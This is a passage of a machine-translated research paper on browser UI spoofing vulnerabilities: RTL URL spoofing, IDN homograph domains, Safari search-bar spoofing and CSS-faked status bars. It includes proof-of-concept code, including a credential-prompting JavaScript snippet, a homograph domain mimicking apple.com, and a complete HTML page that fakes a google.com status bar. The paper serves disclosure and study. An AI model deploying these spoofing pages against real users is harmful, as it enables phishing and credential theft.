name = aa.prompt ( "Enter the name for google");

passwd = aa.prompt ( "Enter the password");

aa.alert ( "Your name is:" + name + "||" + "Your Password is:" + passwd);

aa.document.write ( "<h1> phishing </ h1>");

</ Script>

<Button onclick = "phishing ()"> Click me </ button>

We changed the size of the window, so that javascript Dialog blocked URL Navigate to take effect. Pop-ups and non-full screen window is a necessary

condition, only in the environmental conditions before they can make javascript Dialog for URL Were blocking navigation

27/41
Plug. Figure 16 It is run POC After the whole process of deception.

Map 16

28/41
2.9 Right to left ( RTL) Direction URL Deception ( CVE-2017-5072)

We have already mentioned that some of the language is to be displayed from right to left, such as Arabic language, Hebrew language. package

Text containing these characters can run in both directions, from left to right ( LTR ) Or from right to left ( RTL ). When a URL

When bidirectional text is included, it should be handled in a logical sequence of visual rendering and the address bar of it. Next we say

of CVE-2017-5072 Is a Chrome Up RTL-URL Spoof Vulnerability.

Affected Products: Chrome M59, Android <4.2

Vulnerability Announcement: https://bugs.chromium.org/p/chromium/issues/detail?id=709417

Unicode Bidirectional Algorithm

Unicode Bidirectional algorithm 5 (Referred to as BIDI ) For processing the URL of bidirectional text. Bi-directional text refers to the same

A string, both contain characters from left to right of the display also contains characters from right to left. For example, the most widely used Latin

The text is displayed from left to right ( LTR ), While the Arabic text, the Hebrew text is from right to left ( RTL) . When using two-way text

When present, the character is still a logical order explanation, only the display order of the parallel lines is affected. The display order bidirectional text

Depending on the direction attribute characters in the text. When the browser URL in dealing with a bi-directional text, there may be serious

Security issues, is displayed in the wrong order, which led to URL Spoofing attacks.

CVE-2017-5072

POC: http://127.0.0.1/%D8%A7/example.org

"Http://127.0.0.1/%D8%A7/example.org" It is a two-way text URL% D8% A7 of Unicode word

Character is U + 0627 , Arabic characters are displayed direction RTL . If the browser is not reasonable to do this two-way text URL

The strategy, then the% D8% A7 May force the URL use RTL To show that the address bar final presentation to the user

Yes example.org/ / 127.0.0.1 . Users will think the site is currently visited example.org , But the actual visit is

127.0.0.1 . Figure 17 Fig.

5 http://unicode.org/reports/tr9/

29/41
 Map 17

2.10 Internationalized Domain Names deceive ( CVE-2017-5060 )

2003 Released in the norms of international domain names [ rfc3490] 6 It allows most Unicode Use in the domain name, the

After this general specification called IDNA2003 . After the 2010 In approved the release of IDNA2003 Revisions

[Rfc5895] 7 , Said the revision is IDNA2008 . but IDNA2003 with IDNA2008 And no effective solutions to international

Some domain name in question, then, Unicode Union released [ UTS-46] 8 It addresses some compatibility issues.

in IDNA Used PunyCode Algorithm to achieve non ASCII Domain name to ASCII It converts domain names. PunyCode

Algorithm can be any non ASCII of Unicode The only mapped to a string using only letters, numbers and

Hyphen string encoded domain name in front of all added xn-- To indicate that this is a PunyCode coding. This means

Us can xn-- Later a member of any character, which is likely to deceive users. URL Site http: // . com ,

corresponding PunyCode URL Site http://xn--google.com .

6 https://tools.ietf.org/html/rfc3490

7 https://tools.ietf.org/html/rfc5895

8 http://unicode.org/reports/tr46/

30/41
 CVE-2017-5060 Is a typical use Cyrillic characters caused URL Spoof Vulnerability by Xudong Zheng 9

Find. Vulnerability to because, when the domain name in the Cyrillic script are all characters in the Chrome The address bar of visual rendering straight

Then display the Cyrillic character graphics, and do not use PunyCode Transcoding. And some Latin and Cyrillic characters

The appearance of text characters are very similar, so the user from the visual point of view, is that the address bar www.apple.com .

When you Chrome Access https://www.xn--80ak6aa92e.com/ , See Fig. 18 effect. However, when the user points

Green hit a small lock position to view the source information ( Origin Info Bubble , OIB ) You can see the real or logical order

https://www.xn--80ak6aa92e.com/ Of the Cyrillic characters PunyCode Conversion.

Map 18

Chrome In receiving this vulnerability 2 Months later, he fixes this vulnerability. And given the vulnerability discoverer 2000 US dollar

Reward 10 .

Dramatically, the discoverer of the vulnerability of the same report this issue to the Firefox ,but Firefox Clear back

A fix is not 11 . Figure 19 As shown, when the access https://www.xn--80ak6aa92e.com , Address bar

www.apple.com Also, and certificates displayed www.apple.com .

9 https://www.xudongz.com/blog/2017/idn-phishing/

10 https://bugs.chromium.org/p/chromium/issues/detail?id=683314

11 https://bugzilla.mozilla.org/show_bug.cgi?id=1332714

31/41
 Map 19

Firefox The reason given is security team Cyrillic characters should not be treated as second-class citizens, to the network

Equal opportunity to develop the characters other than Latin. And they think, domain registrars should bear part of the responsibility

Either, this should not be spoofed domain name registered to the user. And encourage users to complain domain name registrar.

Correct Firefox This security risk "turning a blind eye" approach, many people raised objections. For on this domain and

Seemingly identical on the certificate URL deceive, Firefox Do not do anything, frankly I chose the business first, safety

The second approach makes the user feel very disappointed.

2.11 Search engine triggered the address bar spoofing ( CVE-2017-2517 )

In modern browsers, the address bar in addition to the current page URL Type the user to navigate and acceptance of URL These ones

Outside the most basic functions, but also added a lot of new functions and responsibilities, for example, most browsers have the address bar

And search bar into one, vulgar saying smart address bar, this design may vary URL And the search for the presence of logical disorders

Resulting in the address bar spoofing. CVE-2017-2517 It is Safari An address bar on the search engines due to leakage caused by fraud

hole.

Affected Products: iOS <10.3.3, Safari

Vulnerability Announcement: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2517

Safari of URL The address bar and search bar are merged together, in Safari Default settings selectable search engine

32/41
Engine: such as Google, Yahoo, Bing, Baidu, DuckDuckGo ....... Safari Here there is a logical error, when

Content search in the default search engine is a URL, URL The address bar will be displayed in this website.

For example, our default search engine is Baidu, and Baidu search google.com . You can see the address bar significantly

It is shown google.com Because the browser context state is considered in the search environment, the status bar presents content

Search content. This may produce a deception of the user that the URL in the address bar is at this time google.com . Figure

20 Fig.

Map 20

Further thought, if there is a default search engine XSS , An attacker can fake the address bar in the case of the same

You can control the page content, to complete a perfect phishing attacks.

2.12 Browser status bar spoofing

The role of the browser status bar that tells the user that you would want to go. The lower left corner of the status bar is usually displayed in the browser.

Historically, the status bar has been fixed as a browser UI Module is fixed in the lowermost end. Later browser front-end display more

Bubbling is Jian Jie, the status bar instead of the way to show ( Status Bubble ) 12 , Only when the mouse moves over the link status

12 https://www.chromium.org/user-experience/status-bubble

33/41
Bar will be displayed.

Figure twenty one Shown, respectively, Chrome / Firefox / IE The browser when the mouse is moved to google When the link, like

The status bar will be like a bubble emerges as the lower left corner in the browser area, which URL Navigate to address both. When the mouse

Remove the connection time scale, the address bar will instantly disappear.

Map twenty one

Not difficult to find, this browser status bar design way to make UI Display more Jian Jie, optimizing the user clicks the link

Experience. But from another point of view, the status bar UI Is displayed in the browser area of the page, the user can use the script

To control this area, whether this will bring some security risk it?

in CSS3 It has been added to fillet ( border-radius ),shadow( box-shadow ), And gradient ( Gradients )of

Support, which allows us to use CSS A fake status bar possible.

POC :

<! DOCTYPE html>

<Html lang = "zh-CN">

<Head>

34/41
 <Meta content = "text / html; charset = utf-8" http-equiv = "Content-Type">

<Title> Status Bar Spoofing Vulnerability </ title>

<Style>

. chrome {

background: #DFDFDF;

width: 230px;

height: 23px;

- webkit-border-top-right-radius: 4px;

font-size: 12px;

font-family: " Microsoft elegant black ";

color: # 666666;

line-height: 23px;

padding: 0px 0px 0px 3px;

position: absolute;

bottom: 0px;

left: 0px;

display: none;

. Link {

color: blue;

text-decoration: underline;

cursor: pointer;

</ Style>

<Script>

function show (status) {

document.getElementById ( "statusbar") style.display = status.;

function goto (url) {

location = url;

</ Script>

</ Head>

<Body>

<br> <br> <br>

<Center>

<H1> CSS Handling Status Bar Spoofing Vulnerability </ h1> <br> <br> <br> <br>

<B> The True Status Bar: </ b> <a href="http://www.google.com"> Google </a>

<br> <br>

<B> The Spoof Status Bar:

<Span class = "link" onMouseover = "show ( 'block');" onMouseout = "show ( 'none')"

onClick = "goto ( 'http://www.xisigr.com/')"> Google </ span> </ b>

<br> <br> </ center>

35/41
 <Div id = "statusbar" class = "chrome"> www.google.com </ div>

</ Body>

</ Html>

With Chrome For example, access to online DEMO: http://xisigr.com/html5/css/spoofurl.html . Move the mouse

To The True Status Bar: Google . Show the real address bar, as twenty two Below:

Map twenty two

Move the mouse to The Spoof Status Bar: Google . Show fake address bar, as twenty three Below:

Map twenty three

36/41
 Both can be found bubbling status bar is basically identical. This problem, in the author 2011 Discovered and

This was contacted several browser vendors reported the problem. They feedback, this is an interesting question, but does not intend to

repair. Until now, the use of CSS Forge a real address bar still can. Securityfocus.com Was closed

We recorded these issues.

Microsoft Internet Explorer CSS Handling Status Bar Spoofing Vulnerability 13

Google Chrome CSS Handling Status Bar Spoofing Vulnerability 14

Mozilla Firefox CSS Handling Status Bar Spoofing Vulnerability 15

Nevertheless, we still want to CSS Fake address bar on this issue here, be open discussion.

When the user can use a script to forge a browser key UI When deception is likely to happen. We can then look back,

Browser we mentioned earlier in "Dead Man Walking" boundary, beyond which the trust will not happen again.

3 future

In the future for a long period of time, the browser UI Still in a chaotic state, the various browser vendors

For the same UI Understanding and to show there are also many differences. For example, the security indicator modern browser address bar, is

The most common browser security UI It is used to identify the current security status of the site. So for unsecured network protocol ( http) ,

Using security warning symbol ' X The 'or'! The '; for secure and reliable network protocols ( https) , A lock identification symbol

Or shield, its color is red or green. Figure twenty four Shown you can see, each browser vendors, for the same

Site or a technical term representing a status indicator displayed is not the same.

13 http://www.securityfocus.com/bid/47547

14 http://www.securityfocus.com/bid/47548

15 http://www.securityfocus.com/bid/47549

37/41
 Map twenty four

Google in" Rethinking Connection Security Indicators " 16 The security indicator survey two questions,

https : What is the URL to the left of the green symbol mean to you? http : What is the URL to the left of the white symbols mean to you?

Google Investigated 1329 People Chrome Browser security indicator is displayed during normal web browsing understand whether,

then Google The results of the survey are divided into 7 Class: "Connect, identity, protocols, security, icon appearance, I do not know, and

Incorrect theory. "While most (but non-expert) of respondents https Indicator having at least a basic understanding,

But many people are not familiar with http Indicator.

In our discussions browser UI Security, to coincide with the desktop browser experience to the migration and transition mobile browser.

Relative to the previous desktop era, people gradually began to shift to the time of day using similar iPad , iPhone , Apple

Watch Such a mobile device. Figure 25 Fig.

16 https://www.usenix.org/system/files/conference/soups2016/soups2016-paper-porter-felt.pdf

38/41
 Map 25

We have imagined using a browser on your watch. Hackers break up Apple Watch After its run at the

Browser, with predictable results 17 . Figure 26 Fig.

Map 26

Browser screen smaller and smaller, the browser UI Become more pixels must struggle inch. In the Ping Heng user experience and security

Sexual, is bound to bring new challenges.

For example, the following four mobile browser and simultaneous access to Baidu www.baidu.com . You can see the address bar display

Four different ways. Figure 27 Fig.

17 http://www.mobypicture.com/user/comex/view/18097875

39/41
 Map 27

The first browser shows https Security identifier, and shows the complete domain name.

The second browser, only the domain name.

The third browser to display only the title.

Fourth browser shows https Security identifier, and only display the title.

In this four browser address bar UI , Which we think the browser address bar displays the safer it? For the latter

Both browsers address bar presentation, as long as the attacker to add malicious pages < title> Baidu, you know

</ Title> It can be URL Spoof Attack.

History is always moving forward, we enjoy the challenge of bringing new things, but also tie him to face old things brought. Liu

The browser has been around for decades, many of the policy was introduced, grammar still in use. With the push of time

Shift, when more and more intense confrontation between offensive and defensive, some of the old policy, syntax " Safety " Before, becoming more and more conflict

Wu. For example, Dialog alert (), prompt (), confirm (), in 1995 In just let Javascript Together into the browser 18 . This

Some of the dialog box synchronization method, might exist in most modern browsers, because javascript Engine requires users to

18 https://developers.google.com/web/updates/2017/03/dialogs-policy

40/41
Pause, close the dialog box, will continue to perform the following procedures. UI Spoof Vulnerabilities, many of them are due to the Dialog

This characteristic, blocking certain processes and production. Currently Chrome Browser has gradually started to decrease in a box

These scenarios use and recommend a few options dialog box, for example, Notifications API < dialog> .

41/41